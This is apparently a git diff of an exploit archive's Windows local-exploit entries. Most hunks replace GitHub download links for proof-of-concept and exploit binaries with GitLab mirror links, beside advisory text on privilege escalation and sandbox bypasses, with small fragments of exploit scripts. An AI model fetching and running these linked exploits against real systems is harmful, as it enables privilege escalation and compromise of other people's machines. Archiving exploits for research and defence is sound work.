a/exploits/windows/local/29374.txt +++ b/exploits/windows/local/29374.txt @@ -6,4 +6,4 @@ A local attacker could exploit this issue to execute arbitrary machine code with Versions 4.3.246 and 4.3.268 are vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29374.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29374.zip \ No newline at end of file diff --git a/exploits/windows/local/29465.txt b/exploits/windows/local/29465.txt index 8b5219338..b867b06c8 100644 --- a/exploits/windows/local/29465.txt +++ b/exploits/windows/local/29465.txt @@ -6,4 +6,4 @@ A local attacker can exploit this issue to elevate their privileges, which can l Outpost Firewall PRO 4.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29465.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29465.zip \ No newline at end of file diff --git a/exploits/windows/local/29603.txt b/exploits/windows/local/29603.txt index 624fcdde6..a7801a78b 100644 --- a/exploits/windows/local/29603.txt +++ b/exploits/windows/local/29603.txt @@ -6,4 +6,4 @@ Exploiting this flaw permits attackers to bypass the application's component con Comodo Firewall Pro 2.4.17.183 and 2.4.16.174 and Comodo Personal Firewall 2.3.6.81 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29603.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29603.zip \ No newline at end of file diff --git a/exploits/windows/local/29695.txt b/exploits/windows/local/29695.txt index bb180b121..63e58ba72 100644 --- a/exploits/windows/local/29695.txt +++ b/exploits/windows/local/29695.txt @@ -4,4 +4,4 @@ Comodo Firewall Pro is prone to a protection-mechanism-bypass vulnerability. Exploiting this issue allows local attackers to bypass protection mechanisms implemented to restrict access to altering the firewall's configuration settings. This allows them to disable the firewall, aiding them in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29695.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29695.zip \ No newline at end of file diff --git a/exploits/windows/local/29881.txt b/exploits/windows/local/29881.txt index ea5bd03ce..989d22dcd 100644 --- a/exploits/windows/local/29881.txt +++ b/exploits/windows/local/29881.txt @@ -3,7 +3,7 @@ Somehow, our script got on to the Russian forums :/ @w3bd3vil and @abh1sek -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29881.tar.gz +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29881.tar.gz Adobe Acrobat Reader ASLR/DEP bypass Exploit with SANDBOX BYPASS ================================================================= diff --git a/exploits/windows/local/30007.txt b/exploits/windows/local/30007.txt index 1b14e5300..67dc33d12 100644 --- a/exploits/windows/local/30007.txt +++ b/exploits/windows/local/30007.txt @@ -32,4 +32,4 @@ Trendmicro, CDC -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30007.zip \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30007.zip \ No newline at end of file diff --git a/exploits/windows/local/30192.txt b/exploits/windows/local/30192.txt index 1e51f6716..a026e7e4f 100644 --- a/exploits/windows/local/30192.txt +++ b/exploits/windows/local/30192.txt @@ -8,4 +8,4 @@ Kaspersky Internet Security 6.0.2.614 and 6.0.2.621 are vulnerable; other versio NOTE: These issues may be related to BID 23326 (Kaspersky Internet Security Suite Klif.SYS Drive Local Heap Overflow Vulnerability), but this has not been confirmed. If we find that this BID is a duplicate, we will retire it and merge its information into BID 23326. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30192.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30192.zip \ No newline at end of file diff --git a/exploits/windows/local/30680.txt b/exploits/windows/local/30680.txt index c21e8b1db..d7b3d3c70 100644 --- a/exploits/windows/local/30680.txt +++ b/exploits/windows/local/30680.txt @@ -6,4 +6,4 @@ Exploiting this vulnerability allows local attackers to execute arbitrary malici UPDATE: This issue affects only Microsoft Windows XP and 2003 platforms. Microsoft Vista is not affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30680.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30680.zip \ No newline at end of file diff --git a/exploits/windows/local/30681.txt b/exploits/windows/local/30681.txt index 334c6d6d6..ab330f6f7 100644 --- a/exploits/windows/local/30681.txt +++ b/exploits/windows/local/30681.txt @@ -4,4 +4,4 @@ SpeedFan is prone to a local privilege-escalation vulnerability. An attacker could exploit this issue to execute arbitrary machine code with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30681.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30681.zip \ No newline at end of file diff --git a/exploits/windows/local/30999.txt b/exploits/windows/local/30999.txt index 9fd0dc741..ba9fff341 100644 --- a/exploits/windows/local/30999.txt +++ b/exploits/windows/local/30999.txt @@ -8,4 +8,4 @@ This issue occurs when the vulnerable driver is running in a Microsoft Windows V This issue affects 'es1371mp.sys' 5.1.3612.0. Given the nature of the issue, other device drivers and versions may also be vulnerable, but this has not been confirmed. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30999.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30999.zip \ No newline at end of file diff --git a/exploits/windows/local/31090.txt b/exploits/windows/local/31090.txt index ee9453596..ee2b0751c 100644 --- a/exploits/windows/local/31090.txt +++ b/exploits/windows/local/31090.txt @@ -9,7 +9,7 @@ # Home: http://www.hdwsec.fr # Blog : http://www.hdwsec.fr/blog.html -Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31090.xps +Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31090.xps Description : ============== diff --git a/exploits/windows/local/31667.txt b/exploits/windows/local/31667.txt index 34ef04a98..a686d7330 100644 --- a/exploits/windows/local/31667.txt +++ b/exploits/windows/local/31667.txt @@ -4,4 +4,4 @@ Microsoft Windows is prone to a privilege-escalation vulnerability. Successful exploits may allow authenticated users to elevate their privileges to NetworkService. This allows attackers to execute code with elevated privileges and aids in further exploits. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31667.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31667.zip \ No newline at end of file diff --git a/exploits/windows/local/31895.txt b/exploits/windows/local/31895.txt index 296be9bc0..5c3532644 100644 --- a/exploits/windows/local/31895.txt +++ b/exploits/windows/local/31895.txt @@ -30,4 +30,4 @@ The expolit is in the file attatchment named shellcode.txt 2. Select all the content in the editor 3. Click Menu Plugins->CCompletion->Go to identifier (Open in firt view) F11 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31895.7z \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31895.7z \ No newline at end of file diff --git a/exploits/windows/local/32572.txt b/exploits/windows/local/32572.txt index 00e7de901..44b5d3f86 100644 --- a/exploits/windows/local/32572.txt +++ b/exploits/windows/local/32572.txt @@ -9,5 +9,5 @@ The following applications are vulnerable: Anti-Trojan Elite 4.2.1 and earlier Anti-Keylogger Elite 3.3.0 and earlier -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32572-1.zip (AKEProtect_Exp.zip) -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32572-2.zip (Atepmon_DoS.zip) \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32572-1.zip (AKEProtect_Exp.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32572-2.zip (Atepmon_DoS.zip) \ No newline at end of file diff --git a/exploits/windows/local/3260.txt b/exploits/windows/local/3260.txt index b96679f5e..5dae4c45b 100644 --- a/exploits/windows/local/3260.txt +++ b/exploits/windows/local/3260.txt @@ -24,7 +24,7 @@ + Reference : http://www.microsoft.com/technet/security/advisory/932114.mspx - Microsoft Security Advisory (932114) -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3260.doc (02032007-word2000exp.doc) +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3260.doc (02032007-word2000exp.doc) - http://www.returnaddr.org/exploit/word2000 ############ use at your own risk ******* diff --git a/exploits/windows/local/32771.txt b/exploits/windows/local/32771.txt index 6cddb84ef..2a285e384 100644 --- a/exploits/windows/local/32771.txt +++ b/exploits/windows/local/32771.txt @@ -9,4 +9,4 @@ This issue affects versions in the following product groups: Kaspersky AV 2008 Kaspersky AV for WorkStations 6.0 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32771.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32771.zip \ No newline at end of file diff --git a/exploits/windows/local/32850.txt b/exploits/windows/local/32850.txt index 030efe540..f876187b1 100644 --- a/exploits/windows/local/32850.txt +++ b/exploits/windows/local/32850.txt @@ -12,4 +12,4 @@ SlySoft Virtual CloneDrive 5.4.2.3 SlySoft CloneDVD 2.9.2.0 SlySoft CloneCD 5.3.1.3 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32850.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32850.zip \ No newline at end of file diff --git a/exploits/windows/local/32891.txt b/exploits/windows/local/32891.txt index b773c8ac1..154733d8b 100644 --- a/exploits/windows/local/32891.txt +++ b/exploits/windows/local/32891.txt @@ -11,4 +11,4 @@ Windows Server 2003 Windows Vista Windows Server 2008 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32891.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32891.zip \ No newline at end of file diff --git a/exploits/windows/local/32892.txt b/exploits/windows/local/32892.txt index 917e2a581..1f4ba5459 100644 --- a/exploits/windows/local/32892.txt +++ b/exploits/windows/local/32892.txt @@ -9,4 +9,4 @@ The issue affects the following: Windows XP SP2 Windows Server 2003 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32892.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32892.zip \ No newline at end of file diff --git a/exploits/windows/local/32893.txt b/exploits/windows/local/32893.txt index 99f5c7357..51b18fa5b 100644 --- a/exploits/windows/local/32893.txt +++ b/exploits/windows/local/32893.txt @@ -9,4 +9,4 @@ The issue affects the following: Windows Vista Windows Server 2008 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32893.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32893.zip \ No newline at end of file diff --git a/exploits/windows/local/34648.txt b/exploits/windows/local/34648.txt index 440798a3a..3c78ef3a9 100644 --- a/exploits/windows/local/34648.txt +++ b/exploits/windows/local/34648.txt @@ -1,4 +1,4 @@ Exploit: http://www.joxeankoret.com/download/comodo_sandbox_escape/sandbox_test1.tar.gz -Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34648.tar.gz (sandbox_test1.tar.gz) +Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34648.tar.gz (sandbox_test1.tar.gz) Video: http://www.joxeankoret.com/download/comodo_sandbox_escape/video/sandbox_escape1.htm \ No newline at end of file diff --git a/exploits/windows/local/35019.py b/exploits/windows/local/35019.py index 1fbcbfd1f..a0e656628 100755 --- a/exploits/windows/local/35019.py +++ b/exploits/windows/local/35019.py @@ -4,7 +4,7 @@ import zipfile import sys ''' -Full Exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35019.tar.gz +Full Exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35019.tar.gz Very quick and ugly [SandWorm CVE-2014-4114] exploit builder Exploit Title: CVE-2014-4114 SandWorm builder diff --git a/exploits/windows/local/35216.py b/exploits/windows/local/35216.py index 2f0f33af4..e9b758985 100755 --- a/exploits/windows/local/35216.py +++ b/exploits/windows/local/35216.py @@ -1,5 +1,5 @@ # -# Full exploit: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35216.rar +# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar # #CVE-2014-6352 OLE Remote Code Execution #Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com diff --git a/exploits/windows/local/35661.txt b/exploits/windows/local/35661.txt index aee0d55cf..03e558a7d 100644 --- a/exploits/windows/local/35661.txt +++ b/exploits/windows/local/35661.txt @@ -1,5 +1,5 @@ # Source: https://code.google.com/p/google-security-research/issues/detail?id=118#c1 -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35661-poc.zip +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35661-poc.zip Platform: Windows 8.1 Update 32/64 bit (No other OS tested) diff --git a/exploits/windows/local/35901.txt b/exploits/windows/local/35901.txt index 0477ada60..7578f5464 100644 --- a/exploits/windows/local/35901.txt +++ b/exploits/windows/local/35901.txt @@ -25,5 +25,5 @@ FLV file . This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35901-poc.flv -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35901-windbglog.txt \ No newline at end of file +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-poc.flv +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35901-windbglog.txt \ No newline at end of file diff --git a/exploits/windows/local/35902.txt b/exploits/windows/local/35902.txt index 17bba251d..f940f716f 100644 --- a/exploits/windows/local/35902.txt +++ b/exploits/windows/local/35902.txt @@ -25,5 +25,5 @@ M2V file . This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code. -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35902-poc.m2v -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35902-windbglog.txt \ No newline at end of file +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-poc.m2v +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35902-windbglog.txt \ No newline at end of file diff --git a/exploits/windows/local/36424.txt b/exploits/windows/local/36424.txt index 895cc0c5c..69925dd5c 100644 --- a/exploits/windows/local/36424.txt +++ b/exploits/windows/local/36424.txt @@ -41,4 +41,4 @@ Observed Result: Authentication was successful as local system and a file written to the root of the C drive . Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36424.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36424.zip \ No newline at end of file diff --git a/exploits/windows/local/3664.txt b/exploits/windows/local/3664.txt index c59b9d84a..d5af37d71 100644 --- a/exploits/windows/local/3664.txt +++ b/exploits/windows/local/3664.txt @@ -16,6 +16,6 @@ # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d, and more... http://www.0xdeadbeef.info/exploits/raptor_truecrypt.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3664.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3664.tgz # milw0rm.com [2007-04-04] \ No newline at end of file diff --git a/exploits/windows/local/36826.pl b/exploits/windows/local/36826.pl index 29da33964..f3fe761b2 100755 --- a/exploits/windows/local/36826.pl +++ b/exploits/windows/local/36826.pl @@ -39,4 +39,4 @@ my $shell = open($FILE,">$file"); print $FILE $buff.$nseh.$seh.$nop.$shell; close($FILE); -print "+++++++++++++++++++\n"; +print "+++++++++++++++++++\n"; \ No newline at end of file diff --git a/exploits/windows/local/36859.txt b/exploits/windows/local/36859.txt index 5af8c5379..6233841fa 100644 --- a/exploits/windows/local/36859.txt +++ b/exploits/windows/local/36859.txt @@ -59,7 +59,7 @@ A memory corruption occured within the LZW algorithm that is used to decode GIF. =========== http://protekresearchlab.com/exploits/PRL-2015-05.pdf -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36859.pdf +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36859.pdf ############################################################################### \ No newline at end of file diff --git a/exploits/windows/local/36909.rb b/exploits/windows/local/36909.rb index c50b5e4ea..da34bd96b 100755 --- a/exploits/windows/local/36909.rb +++ b/exploits/windows/local/36909.rb @@ -75,4 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/exploits/windows/local/37049.txt b/exploits/windows/local/37049.txt index b4e02a5f1..b4dc1b7fa 100644 --- a/exploits/windows/local/37049.txt +++ b/exploits/windows/local/37049.txt @@ -12,11 +12,11 @@ R136a1 / hfiref0x ## Compiled EXE: ### x86 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou32.exe -+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-32.exe ++ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-32.exe ### x64 + https://github.com/hfiref0x/CVE-2015-1701/raw/master/Compiled/Taihou64.exe -+ Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe ++ Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-64.exe ## Source Code: + https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip -+ EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip \ No newline at end of file ++ EDB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37049-src.zip \ No newline at end of file diff --git a/exploits/windows/local/37657.txt b/exploits/windows/local/37657.txt index 03ca14aed..fcc4bcea2 100644 --- a/exploits/windows/local/37657.txt +++ b/exploits/windows/local/37657.txt @@ -17,4 +17,4 @@ it is possible to triggerthe vulnerability and run arbitrary code in the context Exploit code here : https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37657.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37657.zip \ No newline at end of file diff --git a/exploits/windows/local/37768.txt b/exploits/windows/local/37768.txt index e82d2474e..d0b499532 100644 --- a/exploits/windows/local/37768.txt +++ b/exploits/windows/local/37768.txt @@ -21,4 +21,4 @@ Tested on x64/x86 Windows 7/8.1 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37768.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37768.zip \ No newline at end of file diff --git a/exploits/windows/local/37799.py b/exploits/windows/local/37799.py index 617acf7e6..8292ed09e 100755 --- a/exploits/windows/local/37799.py +++ b/exploits/windows/local/37799.py @@ -53,4 +53,4 @@ try: print "Evil QSE script created!\nHack'n'Roll" except: print "Can't create Evil QSE script :'(" - sys.exit(0) + sys.exit(0) \ No newline at end of file diff --git a/exploits/windows/local/37925.txt b/exploits/windows/local/37925.txt index 3d06f5022..bd105a9d1 100644 --- a/exploits/windows/local/37925.txt +++ b/exploits/windows/local/37925.txt @@ -39,4 +39,4 @@ Observed Result: The target file has been overwritten with the contents of the log file Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37925.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37925.zip \ No newline at end of file diff --git a/exploits/windows/local/38198.txt b/exploits/windows/local/38198.txt index 4f2641674..3561060d0 100644 --- a/exploits/windows/local/38198.txt +++ b/exploits/windows/local/38198.txt @@ -36,4 +36,4 @@ Observed Result: Thread execution redirected to an arbitrary address of 0x55555555. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38198.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38198.zip \ No newline at end of file diff --git a/exploits/windows/local/38199.txt b/exploits/windows/local/38199.txt index 870429130..3de59f748 100644 --- a/exploits/windows/local/38199.txt +++ b/exploits/windows/local/38199.txt @@ -35,4 +35,4 @@ Observed Result: The token was captured in the low IL process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38199.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38199.zip \ No newline at end of file diff --git a/exploits/windows/local/38200.txt b/exploits/windows/local/38200.txt index c002d7043..a231ec239 100644 --- a/exploits/windows/local/38200.txt +++ b/exploits/windows/local/38200.txt @@ -29,4 +29,4 @@ Observed Result: The target file is deleted Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38200.ps1 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38200.ps1 \ No newline at end of file diff --git a/exploits/windows/local/38201.txt b/exploits/windows/local/38201.txt index f653c0d52..9847bcaf0 100644 --- a/exploits/windows/local/38201.txt +++ b/exploits/windows/local/38201.txt @@ -34,4 +34,4 @@ Observed Result: The passed path has all its files deleted (assuming they can be accessed by local system). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38201.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38201.zip \ No newline at end of file diff --git a/exploits/windows/local/38202.txt b/exploits/windows/local/38202.txt index c3d7f9fb8..99a3d9b81 100644 --- a/exploits/windows/local/38202.txt +++ b/exploits/windows/local/38202.txt @@ -32,4 +32,4 @@ Observed Result: The log file ends up copied to c:\program.exe and can be modified by the current user. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38202.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38202.zip \ No newline at end of file diff --git a/exploits/windows/local/38287.txt b/exploits/windows/local/38287.txt index 3c01369ba..a005b5477 100644 --- a/exploits/windows/local/38287.txt +++ b/exploits/windows/local/38287.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=518 A remotely exploitable stack buffer overflow in ThinApp container parsing. Kaspersky Antivirus (I've tested version 15 and 16) and other products using the Kaspersky Engine (such as ZoneAlarm) are affected. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38287.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38287.zip \ No newline at end of file diff --git a/exploits/windows/local/38289.txt b/exploits/windows/local/38289.txt index de961ecc5..1637a0d1d 100644 --- a/exploits/windows/local/38289.txt +++ b/exploits/windows/local/38289.txt @@ -30,4 +30,4 @@ Observed Result: The service executes the file from the temporary directory and allows for elevation. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38289.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38289.zip \ No newline at end of file diff --git a/exploits/windows/local/38474.txt b/exploits/windows/local/38474.txt index 344c9b9f8..39e1fa944 100644 --- a/exploits/windows/local/38474.txt +++ b/exploits/windows/local/38474.txt @@ -49,4 +49,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38474.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38474.zip \ No newline at end of file diff --git a/exploits/windows/local/38792.txt b/exploits/windows/local/38792.txt index c69a65c07..5cdecd2ce 100644 --- a/exploits/windows/local/38792.txt +++ b/exploits/windows/local/38792.txt @@ -49,4 +49,4 @@ Observed Result: A new run key is present in HKLM\Software\Microsoft\Windows\CurrentVersion\Run which executes notepad (note on 64bit systems it will actually be under the Wow6432Node as the service is 32bit, but it will still execute). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38792.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38792.zip \ No newline at end of file diff --git a/exploits/windows/local/39310.txt b/exploits/windows/local/39310.txt index e34558c12..195e8a82f 100644 --- a/exploits/windows/local/39310.txt +++ b/exploits/windows/local/39310.txt @@ -34,4 +34,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39310.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39310.zip \ No newline at end of file diff --git a/exploits/windows/local/39311.txt b/exploits/windows/local/39311.txt index f28b5b7bc..5a58050b3 100644 --- a/exploits/windows/local/39311.txt +++ b/exploits/windows/local/39311.txt @@ -41,4 +41,4 @@ The mount point is created successfully. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39311.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39311.zip \ No newline at end of file diff --git a/exploits/windows/local/39666.txt b/exploits/windows/local/39666.txt index bb570f343..170c3ee2e 100644 --- a/exploits/windows/local/39666.txt +++ b/exploits/windows/local/39666.txt @@ -7,4 +7,4 @@ EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploit Trigger and exploit code for CVE-2014-4113: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39666.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip \ No newline at end of file diff --git a/exploits/windows/local/39694.txt b/exploits/windows/local/39694.txt index 35594ab2e..2bd5541a4 100644 --- a/exploits/windows/local/39694.txt +++ b/exploits/windows/local/39694.txt @@ -45,6 +45,6 @@ POC: ========== https://smsecurity.net/wp-content/uploads/2016/04/Microsoft_Office_Excel_Out-of-Bounds_Read_RCE.xlsm -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39694.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39694.zip ####################################################################################### \ No newline at end of file diff --git a/exploits/windows/local/39788.txt b/exploits/windows/local/39788.txt index b3183c36e..0903a9998 100644 --- a/exploits/windows/local/39788.txt +++ b/exploits/windows/local/39788.txt @@ -22,4 +22,4 @@ SYSTEM, Proof of Concept: https://github.com/hexx0r/CVE-2016-0051 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39788.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39788.zip \ No newline at end of file diff --git a/exploits/windows/local/39804.txt b/exploits/windows/local/39804.txt index 0a675edb3..e02d7f5e8 100644 --- a/exploits/windows/local/39804.txt +++ b/exploits/windows/local/39804.txt @@ -31,7 +31,7 @@ Proof of Concept: Below you can find company file created in QB 2009 and modified to start "Notepad.exe" upon every user login (Admin, no pass). This example will work in any version including 2016 (US, CA, UK) - login procedure execution is required in order to check QB version or edition or to start update, so you will see Notepad before QB "wrong version" error message. https://www.thegrideon.com/qbint/QBFp.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39804.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39804.zip Disclosure Timeline: --------------------- diff --git a/exploits/windows/local/40040.txt b/exploits/windows/local/40040.txt index d5fa63512..3eb4d9152 100644 --- a/exploits/windows/local/40040.txt +++ b/exploits/windows/local/40040.txt @@ -13,4 +13,4 @@ This code exploits 0day privileges escalation vulnerability (or backdoor?) in Sy Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/40040.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40040.zip \ No newline at end of file diff --git a/exploits/windows/local/40118.txt b/exploits/windows/local/40118.txt index d242b38c7..72664d0da 100644 --- a/exploits/windows/local/40118.txt +++ b/exploits/windows/local/40118.txt @@ -14,4 +14,4 